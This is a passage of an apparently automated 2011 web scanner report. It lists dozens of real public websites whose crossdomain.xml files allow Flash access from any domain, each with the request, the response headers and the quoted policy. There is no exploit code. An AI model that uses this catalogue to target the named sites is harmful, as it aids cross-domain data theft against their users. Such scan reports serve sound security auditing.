Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bacardimojito.com

Response

HTTP/1.1 200 OK
Content-Length: 208
Content-Type: text/xml
Last-Modified: Thu, 14 Jun 2007 21:03:33 GMT
Accept-Ranges: bytes
ETag: "7c68ae77c7aec71:5897"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AWS: 06
Date: Wed, 04 May 2011 00:52:27 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

6.18. http://www.barafranca.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.barafranca.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.barafranca.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 03:32:47 GMT
Content-Type: text/xml; charset=utf8
Content-Length: 212
Last-Modified: Fri, 18 Feb 2011 09:17:13 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-do
...[SNIP]...

6.19. http://www.bestvehicle4you.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bestvehicle4you.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bestvehicle4you.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 04 May 2011 01:09:24 GMT
Content-Type: text/xml
Content-Length: 295
Last-Modified: Wed, 13 Apr 2011 23:14:28 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers="
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

6.20. http://www.bluestraveler.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bluestraveler.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bluestraveler.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:54:17 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 12 Apr 2010 22:06:19 GMT
ETag: "971d9f-13e-484115ac4ccc0"
Accept-Ranges: bytes
Content-Length: 318
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-access-from to-ports="443" secure="false" domain="app.topspin.net"/>
<allow-access-from secure="false" domain="*.macromedia.com"/>
<allow-access-from secure="false" domain="*.adobe.com"/>
...[SNIP]...

6.21. http://www.bodybymilk.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bodybymilk.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bodybymilk.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:49:48 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 03 Aug 2010 21:05:52 GMT
ETag: "6201db-d8-48cf1aea68c00"
Accept-Ranges: bytes
Content-Length: 216
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="*" secure="false" /></cros
...[SNIP]...

6.22. http://www.booster-ads.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.booster-ads.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.booster-ads.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:01:17 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 01 Sep 2010 00:43:57 GMT
ETag: "c9af1-c3-48f27fe224d40"
Accept-Ranges: bytes
Content-Length: 195
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

6.23. http://www.box24casino.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.box24casino.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.box24casino.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:43:18 GMT
Server: Apache
Last-Modified: Wed, 26 May 2010 15:07:51 GMT
Accept-Ranges: bytes
Content-Length: 214
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
   <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
       <cross-domain-policy>
        <allow-access-from domain="*" />
       </cross-d
...[SNIP]...

6.24. http://www.bunte.de/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bunte.de
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bunte.de

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:13:25 GMT
Server: Apache
Last-Modified: Thu, 26 Nov 2009 16:19:30 GMT
Accept-Ranges: bytes
Content-Length: 79
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.25. http://www.buzzine.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.buzzine.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.buzzine.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:54:01 GMT
Server: Apache
Last-Modified: Wed, 20 Oct 2010 06:18:52 GMT
ETag: "490c917-176-49306621d0b00"
Accept-Ranges: bytes
Content-Length: 374
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 00:54:01 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*"/>
...[SNIP]...

6.26. http://www.chathambarsinn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.chathambarsinn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.chathambarsinn.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:50:15 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 SVN/1.4.6 PHP/5.2.4-2ubuntu5.7 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
Last-Modified: Tue, 31 Mar 2009 17:21:09 GMT
ETag: "348f0-64-4666d6cc28b40"
Accept-Ranges: bytes
Content-Length: 100
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.27. http://www.cnet.co.uk/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cnet.co.uk
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cnet.co.uk

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:25:44 GMT
Server: Apache
Last-Modified: Fri, 02 Jul 2010 14:35:21 GMT
ETag: "60d1d-13a-48a687f21dc40"
Accept-Ranges: bytes
Content-Length: 314
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" />
...[SNIP]...

6.28. http://www.country925.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.country925.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.country925.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3189737866 3189589003
X-Cache-Server: varnish04
Expires: Wed, 04 May 2011 02:15:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 02:15:16 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.29. http://www.cpanel.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cpanel.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cpanel.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:04:26 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e-p1
Last-Modified: Fri, 16 Apr 2010 05:47:30 GMT
Accept-Ranges: bytes
Content-Length: 235
Cache-Control: max-age=300
Expires: Wed, 04 May 2011 01:09:26 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>


    <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">


    <cross-domain-policy>


    <allow-access-from domain="*" />
...[SNIP]...

6.30. http://www.cyclechaos.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cyclechaos.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cyclechaos.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:33:41 GMT
Server: Apache
Last-Modified: Wed, 07 Jul 2010 21:01:11 GMT
ETag: "2fb80bf-168-48ad2782fb3c0"
Accept-Ranges: bytes
Content-Length: 360
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net"/>
...[SNIP]...

6.31. http://www.dailyhome.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dailyhome.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dailyhome.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:23:58 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 01 Sep 2010 00:43:57 GMT
ETag: "c9af1-c3-48f27fe224d40"
Accept-Ranges: bytes
Content-Length: 195
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

6.32. http://www.davincisurgery.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.davincisurgery.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.davincisurgery.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:45:47 GMT
Server: Sun GlassFish Enterprise Server v2.1
X-Powered-By: Servlet/2.5
Last-Modified: Mon, 02 May 2011 23:49:29 GMT
Content-Type: text/xml;charset=UTF-8
Content-Length: 208
Connection: close

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*" /><allow-access-from domain="www.davincistories.com" /><site-control permitted-cross-domain-policies="all" /></cross-domain
...[SNIP]...

6.33. http://www.dddnews.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dddnews.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dddnews.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:09:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 26 Apr 2012 22:16:39 GMT
Vary: Accept-Encoding
Content-Length: 199
Connection: close
Content-Type: text/plain;charset=iso-8859-1

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.34. http://www.dealercrm.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dealercrm.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dealercrm.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8g DAV/2 PHP/5.3.3
Content-Type: application/xml
Date: Wed, 04 May 2011 02:18:28 GMT
Keep-Alive: timeout=5, max=100
Accept-Ranges: bytes
ETag: "340b06-64-450099d403080"
Connection: close
Set-Cookie: X-Mapping-lcmfminj=5A7BB605F297DFC0ADEC85AB6115BA33; path=/
Last-Modified: Thu, 19 Jun 2008 19:02:10 GMT
Content-Length: 100

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.35. http://www.dezercollection.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dezercollection.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dezercollection.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:06:13 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 08 Dec 2009 20:01:44 GMT
ETag: "ecd6d4-73-b0f7a00"
Accept-Ranges: bytes
Content-Length: 115
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

6.36. http://www.dovogame.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dovogame.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dovogame.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.34
Date: Wed, 04 May 2011 01:14:27 GMT
Content-Type: text/xml; charset=gb2312
Connection: close
Content-Length: 133
Last-Modified: Wed, 29 Sep 2010 09:19:21 GMT
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" secure="false" />
</cross-domain-policy>

6.37. http://www.egroupnet.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.egroupnet.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.egroupnet.com

Response

HTTP/1.1 200 OK
Content-Length: 261
Content-Type: text/xml
Last-Modified: Wed, 17 Nov 2010 19:28:00 GMT
Accept-Ranges: bytes
ETag: "9b4cb08b8d86cb1:58c4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:41:44 GMT
Connection: close

<?xml version="1.0"?>

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
   <allow-http
...[SNIP]...

6.38. http://www.emol.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.emol.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.emol.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 21 Jul 2010 19:26:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-timeE: 1304472030
X-timeS: 1304472030
Content-Length: 119
Connection: close
EM-Cache: HIT
Age: 0
Cache-Control: max-age=300

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.39. http://www.empoweringparents.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.empoweringparents.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.empoweringparents.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:45:09 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.16 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Mon, 11 Apr 2011 15:56:18 GMT
ETag: "ac815c-67-4da324a2"
Accept-Ranges: bytes
Content-Length: 103
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>

<allow-access-from domain="*" />

</cross-domain-policy>

6.40. http://www.everywherechat.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.everywherechat.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.everywherechat.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:45:21 GMT
Server: Apache/2.0.54
Last-Modified: Thu, 01 Nov 2007 02:17:00 GMT
ETag: "1686c8f-cb-a526ff00"
Accept-Ranges: bytes
Content-Length: 203
Vary: User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

6.41. http://www.eye-make-up-tips.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.eye-make-up-tips.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.eye-make-up-tips.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:13:39 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 15 Mar 2008 20:03:20 GMT
ETag: "778180-54-4487f473bf200"
Accept-Ranges: bytes
Content-Length: 84
Vary: User-Agent,Cookie
Connection: close
Content-Type: text/xml

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.42. http://www.ezfolk.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ezfolk.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ezfolk.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:47:08 GMT
Server: Apache
Last-Modified: Tue, 28 Apr 2009 02:02:38 GMT
Accept-Ranges: bytes
Content-Length: 202
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.43. http://www.financesate.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.financesate.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.financesate.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:19:35 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 20 Apr 2010 14:19:22 GMT
ETag: "72ec2f3-68-484abc38e4e80"
Accept-Ranges: bytes
Content-Length: 104
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.44. http://www.flor.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.flor.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.flor.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:30:38 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 08 Sep 2010 20:55:24 GMT
ETag: "24289e8-c6-48fc5bb818700"
Accept-Ranges: bytes
Content-Length: 198
Cache-Control: max-age=7200
Expires: Wed, 04 May 2011 05:30:38 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.45. http://www.funkitron.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.funkitron.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.funkitron.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:08:27 GMT
Server: Apache
Last-Modified: Tue, 05 Jan 2010 18:37:25 GMT
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.46. http://www.gamekult.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.gamekult.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gamekult.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:32:42 GMT
Server: Apache
Last-Modified: Mon, 01 Sep 2008 13:55:24 GMT
ETag: "b34389-d7-455d5f46cab00"
Accept-Ranges: bytes
Content-Length: 215
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross
...[SNIP]...

6.47. http://www.georgeharrison.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.georgeharrison.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.georgeharrison.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:48:04 GMT
Server: Apache/2.2.8 (EL)
Last-Modified: Tue, 08 Sep 2009 20:56:59 GMT
Accept-Ranges: bytes
Content-Length: 106
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 00:48:04 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<cross-domain-policy>
<allow-access-from domain="*" secure="false" to-ports="*" />
</cross-domain-policy>

6.48. http://www.glidden.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.glidden.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.glidden.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:49:30 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 28 Mar 2011 19:06:21 GMT
ETag: "2ace2-c8-a39da540"
Accept-Ranges: bytes
Content-Length: 200
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>

<allow-access-from domain="*" />
</cross-domain-policy>

6.49. http://www.gosupermodel.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.gosupermodel.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gosupermodel.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"161-1292228910000"
Last-Modified: Mon, 13 Dec 2010 08:28:30 GMT
Content-Type: application/xml
Content-Length: 161
Date: Wed, 04 May 2011 04:17:44 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

6.50. http://www.healthzone.ca/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.healthzone.ca
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.healthzone.ca

Response

HTTP/1.1 200 OK
Server: nginx/0.9.4
Date: Wed, 04 May 2011 04:18:19 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Sat, 08 Aug 2009 16:57:27 GMT
WS: 2-3
Content-Length: 164
Age: 0
Via: 1.1 varnish
X-TopsCache: topsvarnish7-1
X-Cache: MISS
Expires: Fri, 03 Jun 2011 04:18:19 GMT
Cache-Control: max-age=2592000

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.51. http://www.homehealthplanet.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.homehealthplanet.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.homehealthplanet.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:56:38 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 01 May 2010 05:05:32 GMT
ETag: "72ec7af-68-485814f25df00"
Accept-Ranges: bytes
Content-Length: 104
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.52. http://www.hot1079.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hot1079.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hot1079.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3188030320
X-Cache-Server: varnish04
Expires: Wed, 04 May 2011 01:21:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:21:50 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.53. http://www.hudong.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hudong.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hudong.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:42:34 GMT
Server: Apache
ETag: "H1ZAnjJKsCk"
Last-Modified: Thu, 24 Sep 2009 07:44:36 GMT
Accept-Ranges: bytes
Content-Length: 317
Content-Type: text/xml
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permit
...[SNIP]...

6.54. http://www.iconaircraft.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.iconaircraft.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.iconaircraft.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:14:54 GMT
Server: Apache
Last-Modified: Sun, 13 Dec 2009 00:18:36 GMT
ETag: "7c96611-d9-47a91190d6f00"
Accept-Ranges: bytes
Content-Length: 217
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cros
...[SNIP]...

6.55. http://www.incontention.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.incontention.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.incontention.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 03:06:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Vary: Cookie
Expires: Wed, 04 May 2011 05:06:21 GMT
Connection: close
